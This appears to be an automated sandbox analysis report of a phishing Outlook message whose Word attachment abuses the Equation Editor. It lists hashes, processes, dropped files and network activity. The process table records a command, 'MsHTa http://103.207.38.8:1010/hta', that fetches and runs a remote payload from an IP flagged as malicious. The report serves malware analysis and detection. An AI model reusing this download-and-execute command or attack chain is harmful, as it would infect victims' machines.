Field | Value
---|---
File name | Administrator Notification_ Redirecting email with malware.msg
Full analysis | https://app.any.run/tasks/2329cdad-3d6a-4880-a14a-adc51de667f2
Verdict | Malicious activity
Analysis date | October 09, 2019, 13:05:25
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/vnd.ms-outlook
File info | CDFV2 Microsoft Outlook Message
MD5 | 0EFA49A6627F75AB47CE3187EC320760
SHA1 | 7EA07F321D970558F3FFE5AED5B08131289E31CE
SHA256 | D5C9840979222286AD94DDA2F052F498AA536C60513191F9A186DEDF6CE10E83
SSDEEP | 3072:frcGXutin1rgwrrO6p/9fCKAvWkKpQ2LbPx9+gIJoWPc:H1cwnjOvWkKi2LN4Kh
Extension | Detected type (score)
---|---
.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2792 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000
2516 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Exit code: 0; Version: 14.0.6025.1000
2336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
2816 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000
3124 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900
3920 | MsHTa http://103.207.38.8:1010/hta &AAAAAAAAC | C:\Windows\system32\MsHTa.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Version: 8.00.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR4B8D.tmp.cvr | — | — | —
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF91A56A699FC54027.TMP | — | — | —
2516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRA805.tmp.cvr | — | — | —
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice (2).doc\:Zone.Identifier:$DATA | — | — | —
2336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB795.tmp.cvr | — | — | —
2336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\1C05E995.doc\:Zone.Identifier:$DATA | — | — | —
2816 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\msoC476.tmp | — | — | —
2816 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\~WRS{8E647E7B-B2A1-4EF9-82FB-FEAB71EB8FC5}.tmp | — | — | —
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | 085133BDF7ACA5C88C899D8859FE23AC | AE9808F0B4ECBEFED1A284B36BA1F87F0C127C92B7D9F1C7523C33CA8F11EB12
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice.doc | text | FEEAB7C41B73D8F03B3D4D005A8B8BF3 | 1AE650453A47CBF7872860245C7FEFF1DC7F82E9AFC0AE9D431B66CA6F324ADE
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3920 | MsHTa.exe | GET | — | 103.207.38.8:1010 | http://103.207.38.8:1010/hta | VN | — | — | malicious |
2792 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3920 | MsHTa.exe | 103.207.38.8:1010 | — | VNPT Corp | VN | malicious |
2792 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation
---|---|---
config.messenger.msn.com | — | whitelisted
PID | Process | Class | Message |
---|---|---|---|
3920 | MsHTa.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |